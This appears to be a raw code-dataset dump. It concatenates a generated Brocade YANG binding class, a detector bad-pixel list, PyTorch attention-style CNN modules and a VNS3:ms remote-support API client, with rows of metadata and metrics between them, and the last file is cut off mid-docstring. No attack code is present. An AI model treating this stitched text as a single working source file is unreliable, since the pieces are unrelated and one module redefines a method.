      t = YANGDynClass(v,base=enable.enable, is_container='container', presence=False, yang_name="enable", rest_name="enable", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure MAPS policy/actions', u'callpoint': u'maps_enable_policy_callpoint', u'cli-incomplete-no': None}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='container', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """enable must be of a type compatible with container""",
          'defined-type': "container",
          'generated-type': """YANGDynClass(base=enable.enable, is_container='container', presence=False, yang_name="enable", rest_name="enable", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure MAPS policy/actions', u'callpoint': u'maps_enable_policy_callpoint', u'cli-incomplete-no': None}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='container', is_config=True)""",
        })
    self.__enable = t
    if hasattr(self, '_set'):
      self._set()

  def _unset_enable(self):
    self.__enable = YANGDynClass(base=enable.enable, is_container='container', presence=False, yang_name="enable", rest_name="enable", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure MAPS policy/actions', u'callpoint': u'maps_enable_policy_callpoint', u'cli-incomplete-no': None}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='container', is_config=True)

  def _get_email(self):
    """
    Getter method for email, mapped from YANG variable /rbridge_id/maps/email (container)
    """
    return self.__email

  def _set_email(self, v, load=False):
    """
    Setter method for email, mapped from YANG variable /rbridge_id/maps/email (container)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_email is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_email() directly.
    """
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=email.email, is_container='container', presence=False, yang_name="email", rest_name="email", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'MAPS Email options', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='container', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """email must be of a type compatible with container""",
          'defined-type': "container",
          'generated-type': """YANGDynClass(base=email.email, is_container='container', presence=False, yang_name="email", rest_name="email", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'MAPS Email options', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='container', is_config=True)""",
        })
    self.__email = t
    if hasattr(self, '_set'):
      self._set()

  def _unset_email(self):
    self.__email = YANGDynClass(base=email.email, is_container='container', presence=False, yang_name="email", rest_name="email", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'MAPS Email options', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='container', is_config=True)

  def _get_relay(self):
    """
    Getter method for relay, mapped from YANG variable /rbridge_id/maps/relay (list)
    """
    return self.__relay

  def _set_relay(self, v, load=False):
    """
    Setter method for relay, mapped from YANG variable /rbridge_id/maps/relay (list)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_relay is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_relay() directly.
    """
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=YANGListType("hostip",relay.relay, yang_name="relay", rest_name="relay", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='hostip', extensions={u'tailf-common': {u'info': u'Configure relay ip mail settings', u'cli-suppress-mode': None, u'cli-suppress-list-no': None, u'cli-full-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'maps_relay_callpoint'}}), is_container='list', yang_name="relay", rest_name="relay", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure relay ip mail settings', u'cli-suppress-mode': None, u'cli-suppress-list-no': None, u'cli-full-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'maps_relay_callpoint'}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='list', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """relay must be of a type compatible with list""",
          'defined-type': "list",
          'generated-type': """YANGDynClass(base=YANGListType("hostip",relay.relay, yang_name="relay", rest_name="relay", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='hostip', extensions={u'tailf-common': {u'info': u'Configure relay ip mail settings', u'cli-suppress-mode': None, u'cli-suppress-list-no': None, u'cli-full-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'maps_relay_callpoint'}}), is_container='list', yang_name="relay", rest_name="relay", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure relay ip mail settings', u'cli-suppress-mode': None, u'cli-suppress-list-no': None, u'cli-full-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'maps_relay_callpoint'}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='list', is_config=True)""",
        })
    self.__relay = t
    if hasattr(self, '_set'):
      self._set()

  def _unset_relay(self):
    self.__relay = YANGDynClass(base=YANGListType("hostip",relay.relay, yang_name="relay", rest_name="relay", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='hostip', extensions={u'tailf-common': {u'info': u'Configure relay ip mail settings', u'cli-suppress-mode': None, u'cli-suppress-list-no': None, u'cli-full-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'maps_relay_callpoint'}}), is_container='list', yang_name="relay", rest_name="relay", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure relay ip mail settings', u'cli-suppress-mode': None, u'cli-suppress-list-no': None, u'cli-full-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'maps_relay_callpoint'}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='list', is_config=True)

  # Public properties (Python 2 `__builtin__.property`) wrapping the
  # generated getter/setter pairs.
  logicalgroup = __builtin__.property(_get_logicalgroup, _set_logicalgroup)
  rule = __builtin__.property(_get_rule, _set_rule)
  policy = __builtin__.property(_get_policy, _set_policy)
  enable = __builtin__.property(_get_enable, _set_enable)
  email = __builtin__.property(_get_email, _set_email)
  relay = __builtin__.property(_get_relay, _set_relay)

  # Map of element name -> property, used by __init__'s copy-construction.
  _pyangbind_elements = {'logicalgroup': logicalgroup, 'rule': rule, 'policy': policy, 'enable': enable, 'email': email, 'relay': relay, }
90.105263
1,091
0.729447
3,870
27,392
4.977519
0.051163
0.025749
0.034886
0.037377
0.879406
0.866116
0.86051
0.85428
0.851373
0.841406
0
0.000248
0.116019
27,392
303
1,092
90.40264
0.795284
0.095028
0
0.453608
0
0.030928
0.436796
0.158868
0
0
0
0
0
1
0.108247
false
0
0.072165
0
0.298969
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
73753d81513c855738837750580f91ea4b3e5902
3,219
py
Python
pyCHX/v2/_futurepyCHX/Badpixels.py
NSLS-II/pyCHX
e82e343903e477c4359b03c4d079eb1e5202c25f
[ "BSD-3-Clause" ]
2
2021-07-21T02:07:11.000Z
2022-02-18T02:57:49.000Z
pyCHX/v2/_futurepyCHX/Badpixels.py
NSLS-II/pyCHX
e82e343903e477c4359b03c4d079eb1e5202c25f
[ "BSD-3-Clause" ]
5
2021-06-16T20:31:45.000Z
2022-02-04T21:24:45.000Z
pyCHX/v2/_futurepyCHX/Badpixels.py
NSLS-II/pyCHX
e82e343903e477c4359b03c4d079eb1e5202c25f
[ "BSD-3-Clause" ]
2
2022-02-04T21:51:28.000Z
2022-03-22T04:11:19.000Z
"""Dev@Octo12,2017"""

import numpy as np

# Damaged-pixel cluster on the 4M detector, recorded as (column, row) pairs
# in detector coordinates.  2167 - row converts each entry to the flipped
# row index used everywhere else in this module.
_DAMAGED_COL_ROW = [
    (1157, 1231), (1158, 1231), (1159, 1231), (1160, 1231),
    (1157, 1230), (1158, 1230), (1159, 1230), (1160, 1230), (1161, 1230),
    (1157, 1229), (1158, 1229), (1159, 1229), (1160, 1229),
    (1159, 1228), (1160, 1228),
    (1159, 1227), (1160, 1227),
    (1159, 1226),
]
damaged_4Mpixel = np.array([[col, 2167 - row] for col, row in _DAMAGED_COL_ROW])

# March 1, 2018: flat (raveled) bad-pixel indices per uid, both from the
# coralpor measurements.
bad_pixel_4M = {
    # uid '92394a' -- 57 points, coralpor
    "92394a": np.array([
        828861, 882769, 915813, 928030, 959317, 959318, 992598, 992599,
        998768, 1009202, 1036105, 1143261, 1149650, 1259208, 1321301,
        1426856, 1426857, 1586163, 1774616, 1936607, 1936609, 1936610,
        1938677, 1938678, 1938681, 1940747, 1946959, 1955276, 2105743,
        2105744, 2107813, 2107815, 2109883, 2118276, 2118277, 2149798,
        2194925, 2283956, 2284016, 2284225, 2284388, 2290249, 2292593,
        2298770, 2304729, 2317145, 2344268, 2346156, 2356554, 2360827,
        2364960, 2408361, 2453913, 2470447, 2476691, 3462303, 4155535,
    ]),
    # uid '6cc34a' -- coralpor
    "6cc34a": np.array([
        1058942, 2105743, 2105744, 2107813, 2107815, 2109883, 4155535,
    ]),
}

# Combined list created during the 2018 Cycle 1 run: both uid lists back to
# back plus two extra pixels.  Duplicated indices are intentionally kept,
# matching the historical hand-assembled array.
BadPix_4M = np.concatenate([
    bad_pixel_4M["92394a"],
    bad_pixel_4M["6cc34a"],
    np.array([2107814, 3462303]),
])
19.047337
71
0.396707
222
3,219
5.734234
0.436937
0.037706
0.065986
0.087981
0.700707
0.700707
0.700707
0.623723
0.623723
0.623723
0
0.737726
0.519105
3,219
168
72
19.160714
0.084625
0.031687
0
0.773585
0
0
0.003863
0
0
0
0
0
0
1
0
false
0
0.006289
0
0.006289
0
0
0
0
null
0
0
0
0
1
1
0
0
1
0
1
1
0
0
0
0
1
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
73b0d45dfef30d5094f6080613673ff87487a344
13,695
py
Python
model/Models.py
lnpandey/DL_explore_synth_data
0a5d8b417091897f4c7f358377d5198a155f3f24
[ "MIT" ]
2
2019-08-24T07:20:35.000Z
2020-03-27T08:16:59.000Z
model/Models.py
lnpandey/DL_explore_synth_data
0a5d8b417091897f4c7f358377d5198a155f3f24
[ "MIT" ]
null
null
null
model/Models.py
lnpandey/DL_explore_synth_data
0a5d8b417091897f4c7f358377d5198a155f3f24
[ "MIT" ]
3
2019-06-21T09:34:32.000Z
2019-09-19T10:43:07.000Z
import numpy as np import torch.nn as nn import torch.optim as optim import torch import torchvision import torch.nn.functional as F device = torch.device("cuda" if torch.cuda.is_available() else "cpu") print(device) class Module1(nn.Module): ''' returns last layer output Input : 32X32X3 image Convolutional Network with 4 Conv layers ''' def __init__(self,inp,out): super(Module1,self).__init__() self.inputs = inp self.output = out self.conv1 = nn.Conv2d(self.inputs, 6, 5) self.pool = nn.MaxPool2d(2, 2) self.conv2 = nn.Conv2d(6, 12, 5) self.conv3 = nn.Conv2d(12,20,5) self.fc1 = nn.Linear(20 * 6 * 6, 120) self.fc2 = nn.Linear(120, 84) self.fc3 = nn.Linear(84, 10) self.fc4 = nn.Linear(10,self.output) def forward(self,x): x = self.pool(F.relu(self.conv1(x))) x = F.relu(self.conv2(x)) x = F.relu(self.conv3(x)) #print(x.shape) x = x.view(-1, 20* 6 * 6) x = F.relu(self.fc1(x)) x = F.relu(self.fc2(x)) x = F.relu(self.fc3(x)) x = self.fc4(x) return x class Module2(nn.Module): ''' return last layer output, 3rd convolution layer output Input : 32X32X3 image Output : x: last layer output, x1: 3rd convolution layer output Convolutional Network with 4 Conv layers ''' def __init__(self,inp,out): super(Module2,self).__init__() self.inputs = inp self.output = out self.conv1 = nn.Conv2d(self.inputs, 6, 5) self.pool = nn.MaxPool2d(2, 2) self.conv2 = nn.Conv2d(6, 12, 5) self.conv3 = nn.Conv2d(12,20,5) self.fc1 = nn.Linear(20 * 6 * 6, 120) self.fc2 = nn.Linear(120, 84) self.fc3 = nn.Linear(84, 10) self.fc4 = nn.Linear(10,self.output) def forward(self,x): x = self.pool(F.relu(self.conv1(x))) x = F.relu(self.conv2(x)) x = self.conv3(x) #print(x.shape) x1 = F.tanh(x) x = F.relu(x) x = x.view(-1, 20* 6 * 6) x = F.relu(self.fc1(x)) x = F.relu(self.fc2(x)) x = F.relu(self.fc3(x)) x = self.fc4(x) return x,x1 class Module3(nn.Module): ''' return last layer output, 2nd convolution layer output Input : 32X32X3 image Output : x: last layer output, x1: second convolution layer output ''' def 
__init__(self,inp,out): super(Module3,self).__init__() self.inputs = inp self.output = out self.conv1 = nn.Conv2d(self.inputs, 6, 5) self.pool = nn.MaxPool2d(2, 2) self.conv2 = nn.Conv2d(6, 12, 5) self.conv3 = nn.Conv2d(12,20,5) self.fc1 = nn.Linear(20 * 6 * 6, 120) self.fc2 = nn.Linear(120, 84) self.fc3 = nn.Linear(84, 10) self.fc4 = nn.Linear(10,self.output) def forward(self,x): x = self.pool(F.relu(self.conv1(x))) x = self.conv2(x) x1 = F.tanh(x) x = F.relu(x) x = F.relu(self.conv3(x)) #print("Flag1",x1.shape) x = x.view(-1, 20* 6 * 6) x = F.relu(self.fc1(x)) x = F.relu(self.fc2(x)) x = F.relu(self.fc3(x)) x = self.fc4(x) return x,x1 class Module4(nn.Module): ''' return last layer output, first convolution layer output Input : 32X32X3 image Output : x: last layer output, x1: first convolution layer output ''' def __init__(self,inp,out): super(Module4,self).__init__() self.inputs = inp self.output = out self.conv1 = nn.Conv2d(self.inputs, 6, 5) self.pool = nn.MaxPool2d(2, 2) self.conv2 = nn.Conv2d(6, 12, 5) self.conv3 = nn.Conv2d(12,20,5) self.fc1 = nn.Linear(20 * 6 * 6, 120) self.fc2 = nn.Linear(120, 84) self.fc3 = nn.Linear(84, 10) self.fc4 = nn.Linear(10,self.output) def forward(self,x): x = self.conv1(x) x1 = F.tanh(x) x = self.pool(F.relu(x)) x = F.relu(self.conv2(x)) x = F.relu(self.conv3(x)) #print("Flag1",x1.shape) x = x.view(-1, 20* 6 * 6) x = F.relu(self.fc1(x)) x = F.relu(self.fc2(x)) x = F.relu(self.fc3(x)) x = self.fc4(x) return x,x1 class Module5(nn.Module): ''' return last layer output Input : 32X32X3 image Convolutional Network with 2 Conv layers Output: returns last layer output ''' def __init__(self,inp,out): super(Module5,self).__init__() self.inputs = inp self.output = out self.conv1 = nn.Conv2d(self.inputs, 6, 5) self.pool = nn.MaxPool2d(2, 2) self.conv2 = nn.Conv2d(6, 16, 5) self.fc1 = nn.Linear(16 * 5 * 5, 120) self.fc2 = nn.Linear(120, 84) self.fc3 = nn.Linear(84, 10) self.fc4 = nn.Linear(10,self.output) def forward(self,x): x = 
self.pool(F.relu(self.conv1(x))) x = self.pool(F.relu(self.conv2(x))) x = x.view(-1, 16 * 5 * 5) x = F.relu(self.fc1(x)) x = F.relu(self.fc2(x)) x = F.relu(self.fc3(x)) x = self.fc4(x) return x class Focus_Module(nn.Module): ''' Focus Network uses Module 1 averages at zeroth layer ''' def __init__(self,inp,out): super(Focus_Module, self).__init__() self.inputs = inp self.output = out self.module1 = Module1(self.inputs,self.output) def forward(self, z): #print(z.shape) #print() batch = z.shape[0] x = torch.zeros([batch,9],dtype=torch.float64) y = torch.zeros([batch,self.inputs, 32,32], dtype=torch.float64) x,y = x.to(device),y.to(device) for i in range(9): x[:,i] = self.helper(z[:,i])[:,0] x = F.softmax(x,dim=1) # alphas #x1 = x[:,0] #torch.mul(x1[:,None,None,None],z[:,0]) for i in range(9): x1 = x[:,i] y = y + torch.mul(x1[:,None,None,None],z[:,i]) return y , x def helper(self,x): x = self.module1(x) #print(x.shape) return x class Focus_Module2(nn.Module): ''' Focus Network uses Module 2 averages at 3rd conv layer ''' def __init__(self,inp,out): super(Focus_Module2, self).__init__() self.inputs = inp self.output = out self.module = Module2(self.inputs,self.output) def forward(self, z): #print("flag1",z.shape) #print("flag2",z[:,0].shape) batch = z.shape[0] x = torch.zeros([batch,9],dtype=torch.float64) y = torch.zeros([batch,20, 6,6], dtype=torch.float64) feature = torch.zeros([batch,9,20,6,6],dtype=torch.float64) x,y = x.to(device),y.to(device) feature = feature.to(device) for i in range(9): alp,ftr= self.helper(z[:,i]) #print("flag3",ftr.shape) x[:,i] = alp[:,0] feature[:,i] = ftr x = F.softmax(x,dim=1) # alphas #x1 = x[:,0] #torch.mul(x1[:,None,None,None],z[:,0]) for i in range(9): x1 = x[:,i] y = y + torch.mul(x1[:,None,None,None],feature[:,i]) return y , x def helper(self,x): x,features = self.module(x) #print(x.shape) return x,features class Focus_Module3(nn.Module): ''' Focus Network uses Module 3 averages at conv layer 2 ''' def __init__(self,inp,out): 
super(Focus_Module3, self).__init__() self.inputs = inp self.output = out self.module = Module3(self.inputs,self.output) def forward(self, z): #print("flag1",z.shape) #print("flag2",z[:,0].shape) batch = z.shape[0] x = torch.zeros([batch,9],dtype=torch.float64) y = torch.zeros([batch,9, 6,10], dtype=torch.float64) feature = torch.zeros([batch,9,6,10,10],dtype=torch.float64) x,y = x.to(device),y.to(device) feature = feature.to(device) for i in range(9): alp,ftr= self.helper(z[:,i]) #print("flag3",ftr.shape) x[:,i] = alp[:,0] feature[:,i] = ftr x = F.softmax(x,dim=1) # alphas #x1 = x[:,0] #torch.mul(x1[:,None,None,None],z[:,0]) for i in range(9): x1 = x[:,i] y = y + torch.mul(x1[:,None,None,None],feature[:,i]) return y , x def helper(self,x): x,features = self.module(x) #print(x.shape) return x,features class Focus_Module4(nn.Module): ''' Focus Network uses Module 4 averages at conv layer 1 ''' def __init__(self,inp,out): super(Focus_Module4, self).__init__() self.inputs = inp self.output = out self.module = Module4(self.inputs,self.output) def forward(self, z): #print("flag1",z.shape) #print("flag2",z[:,0].shape) batch = z.shape[0] x = torch.zeros([batch,9],dtype=torch.float64) y = torch.zeros([batch,6, 28,28], dtype=torch.float64) feature = torch.zeros([batch,9,6,28,28],dtype=torch.float64) x,y = x.to(device),y.to(device) feature = feature.to(device) for i in range(9): alp,ftr= self.helper(z[:,i]) #print("flag3",ftr.shape) x[:,i] = alp[:,0] feature[:,i] = ftr x = F.softmax(x,dim=1) # alphas #x1 = x[:,0] #torch.mul(x1[:,None,None,None],z[:,0]) for i in range(9): x1 = x[:,i] y = y + torch.mul(x1[:,None,None,None],feature[:,i]) return y , x class Focus_Module5(nn.Module): ''' Focus Network uses Module 5 averages at zroth layer ''' def __init__(self,inp,out): super(Focus_Module5, self).__init__() self.inputs = inp self.output = out self.module = Module5(self.inputs,self.output) def forward(self, z): #print("flag1",z.shape) #print("flag2",z[:,0].shape) batch = 
z.shape[0] x = torch.zeros([batch,9],dtype=torch.float64) y = torch.zeros([batch,3, 32,32], dtype=torch.float64) feature = torch.zeros([batch,9,3,32,32],dtype=torch.float64) x,y = x.to(device),y.to(device) feature = feature.to(device) for i in range(9): alp= self.helper(z[:,i]) #print("flag3",ftr.shape) x[:,i] = alp[:,0] x = F.softmax(x,dim=1) # alphas #x1 = x[:,0] #torch.mul(x1[:,None,None,None],z[:,0]) for i in range(9): x1 = x[:,i] y = y + torch.mul(x1[:,None,None,None],feature[:,i]) return y , x def helper(self,x): x,features = self.module(x) #print(x.shape) return x,features def helper(self,x): x= self.module(x) #print(x.shape) return x class Classification_Module(nn.Module): ''' Classification Network data averaged at zeroth layer ''' def __init__(self,inp,out): super(Classification_Module,self).__init__() self.inputs = inp self.output = out self.conv1 = nn.Conv2d(self.inputs, 6, 5) self.pool = nn.MaxPool2d(2, 2) self.conv2 = nn.Conv2d(6, 8, 5) self.fc1 = nn.Linear(8 * 5 * 5, 120) self.fc2 = nn.Linear(120, 84) self.fc3 = nn.Linear(84, 10) self.fc4 = nn.Linear(10,self.output) def forward(self,x): #print("input",x.shape) x = self.pool(F.relu(self.conv1(x))) x = self.pool(F.relu(self.conv2(x))) #print("middle",x.shape) x = x.view(-1,8*5*5) #print() x = F.relu(self.fc1(x)) x = F.relu(self.fc2(x)) x = F.relu(self.fc3(x)) x = self.fc4(x) #print("output",x.shape) return x class Classification_Module2(nn.Module): ''' Classification Network averaged data at 3rd conv layer ''' def __init__(self,inp,out): super(Classification_Module2,self).__init__() self.inputs = inp self.output = out self.fc1 = nn.Linear(20 *6 *6 , 120) self.fc2 = nn.Linear(120, 84) self.fc3 = nn.Linear(84, 10) self.fc4 = nn.Linear(10,self.output) def forward(self,x): x = x.view(-1,20*6*6) x = F.relu(self.fc1(x)) x = F.relu(self.fc2(x)) x = F.relu(self.fc3(x)) x = self.fc4(x) return x class Classification_Module3(nn.Module): ''' Classification Network averaged data at conv layer 2 ''' def 
__init__(self,inp,out): super(Classification_Module3,self).__init__() self.inputs = inp self.output = out self.conv1 = nn.Conv2d(self.inputs, 20, 5) self.fc1 = nn.Linear(20 *6 *6 , 120) self.fc2 = nn.Linear(120, 84) self.fc3 = nn.Linear(84, 10) self.fc4 = nn.Linear(10,self.output) def forward(self,x): x = F.relu(self.conv1(x)) #print("flag1",x.shape) x = x.view(-1,20*6*6) x = F.relu(self.fc1(x)) x = F.relu(self.fc2(x)) x = F.relu(self.fc3(x)) x = self.fc4(x) return x class Classification_Module4(nn.Module): ''' Classification Network averages data at conv layer 1 ''' def __init__(self,inp,out): super(Classification_Module4,self).__init__() self.inputs = inp self.output = out self.pool = nn.MaxPool2d(2, 2) self.conv1 = nn.Conv2d(self.inputs, 12, 5) self.conv2 = nn.Conv2d(12,20,5) self.fc1 = nn.Linear(20 *8 *8 , 120) self.fc2 = nn.Linear(120, 84) self.fc3 = nn.Linear(84, 10) self.fc4 = nn.Linear(10,self.output) def forward(self,x): x = F.relu(self.pool(self.conv1(x))) x= F.relu(self.conv2(x)) #print("flag1",x.shape) x = x.view(-1,20*8*8) x = F.relu(self.fc1(x)) x = F.relu(self.fc2(x)) x = F.relu(self.fc3(x)) x = self.fc4(x) return x class Classification_Module5(nn.Module): ''' Classification Network data averaged at zeroth conv layer ''' def __init__(self,inp,out): super(Classification_Module5,self).__init__() self.inputs = inp self.output = out self.conv1 = nn.Conv2d(self.inputs, 6, 5) self.pool = nn.MaxPool2d(2, 2) self.conv2 = nn.Conv2d(6, 16, 5) self.fc1 = nn.Linear(16 * 5 * 5, 120) self.fc2 = nn.Linear(120, 84) self.fc3 = nn.Linear(84, 10) self.fc4 = nn.Linear(10,self.output) def forward(self,x): x = self.pool(F.relu(self.conv1(x))) x= self.pool(F.relu(self.conv2(x))) #print("flag1",x.shape) x = x.view(-1,16*5*5) x = F.relu(self.fc1(x)) x = F.relu(self.fc2(x)) x = F.relu(self.fc3(x)) x = self.fc4(x) return x
26.185468
71
0.586272
2,229
13,695
3.538807
0.053387
0.018002
0.054767
0.049442
0.917977
0.915314
0.861942
0.838109
0.801597
0.739478
0
0.067942
0.240161
13,695
522
72
26.235632
0.690083
0.154801
0
0.793605
0
0
0.000618
0
0
0
0
0
0
1
0.101744
false
0
0.017442
0
0.22093
0.002907
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
73bafee8aff0375936e003f370e59ec1424ca003
37,976
py
Python
cohesivenet/api/vns3ms/system_api.py
cohesive/python-cohesivenet-sdk
5620acfa669ff97c94d9aa04a16facda37d648c1
[ "MIT" ]
null
null
null
cohesivenet/api/vns3ms/system_api.py
cohesive/python-cohesivenet-sdk
5620acfa669ff97c94d9aa04a16facda37d648c1
[ "MIT" ]
null
null
null
cohesivenet/api/vns3ms/system_api.py
cohesive/python-cohesivenet-sdk
5620acfa669ff97c94d9aa04a16facda37d648c1
[ "MIT" ]
null
null
null
# coding: utf-8 """ VNS3:ms API Cohesive networks VNS3 provides complete control of your network's addresses, routes, rules and edge. Networking does # noqa: E501 Contact: solutions@cohesive.net Generated by: https://openapi-generator.tech """ from __future__ import absolute_import import re # noqa: F401 from cohesivenet.api_builder import VersionRouter def get_remote_support_details(api_client, **kwargs): # noqa: E501 """Get Remote Support Details # noqa: E501 Get Remote Support details - check if enabled # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> response = await api.get_remote_support_details(async_req=True) :param VNS3Client api_client: (required) :param async_req bool: execute request asynchronously :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. 
:return: APIResponse or awaitable if async """ local_var_params = locals() request_params = [] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = {} # HTTP header `Accept` header_params["Accept"] = api_client.select_header_accept( ["application/json"] ) # noqa: E501 # Authentication setting auth_settings = ["ApiTokenAuth", "basicAuth"] # noqa: E501 return api_client.call_api( "/system/remote_support", "GET", path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type="object", # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get("async_req"), _return_http_data_only=local_var_params.get( "_return_http_data_only" ), # noqa: E501 _preload_content=local_var_params.get("_preload_content", True), _request_timeout=local_var_params.get("_request_timeout"), collection_formats=collection_formats, ) def put_remote_support(api_client, enable=False, **kwargs): # noqa: E501 """Get Remote Support Details # noqa: E501 Enable/Disable remote support # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> response = await api.put_remote_support(enable=True, async_req=True) :param VNS3Client api_client: (required) :param enable bool: Enable/Disable remote support(required) :param async_req bool: execute request asynchronously :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. 
:return: APIResponse or awaitable if async """ local_var_params = locals() request_params = ["enable"] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = {} for param in [p for p in request_params if local_var_params.get(p) is not None]: body_params[param] = local_var_params[param] # HTTP header `Accept` header_params["Accept"] = api_client.select_header_accept( ["application/json"] ) # noqa: E501 # HTTP header `Content-Type` header_params["Content-Type"] = api_client.select_header_content_type( # noqa: E501 ["application/json"] ) # noqa: E501 # Authentication setting auth_settings = ["ApiTokenAuth", "basicAuth"] # noqa: E501 return api_client.call_api( "/system/remote_support", "PUT", path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type="object", # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get("async_req"), _return_http_data_only=local_var_params.get( "_return_http_data_only" ), # noqa: E501 _preload_content=local_var_params.get("_preload_content", True), _request_timeout=local_var_params.get("_request_timeout"), collection_formats=collection_formats, ) def get_remote_support_keypair_details(api_client, **kwargs): # noqa: E501 """Get Remote Support Keypair status # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> response = await api.get_remote_support_keypair_details(async_req=True) :param VNS3Client api_client: (required) :param async_req bool: execute request asynchronously :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. 
:return: APIResponse or awaitable if async """ local_var_params = locals() request_params = [] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = {} # HTTP header `Accept` header_params["Accept"] = api_client.select_header_accept( ["application/json"] ) # noqa: E501 # Authentication setting auth_settings = ["ApiTokenAuth", "basicAuth"] # noqa: E501 return api_client.call_api( "/system/remote_support/keypair", "GET", path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type="object", # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get("async_req"), _return_http_data_only=local_var_params.get( "_return_http_data_only" ), # noqa: E501 _preload_content=local_var_params.get("_preload_content", True), _request_timeout=local_var_params.get("_request_timeout"), collection_formats=collection_formats, ) def post_generate_remote_support_keypair( api_client, encrypted_passphrase=None, **kwargs ): # noqa: E501 """Generate new remote support keypair # noqa: E501 Will regenerate keyapir if one already exists # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> response = await api.post_generate_remote_support_keypair("asdfasd", async_req=True) :param VNS3Client api_client: (required) :param encrypted_passphrase str: Encrypted passphrase string :param async_req bool: execute request asynchronously :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. 
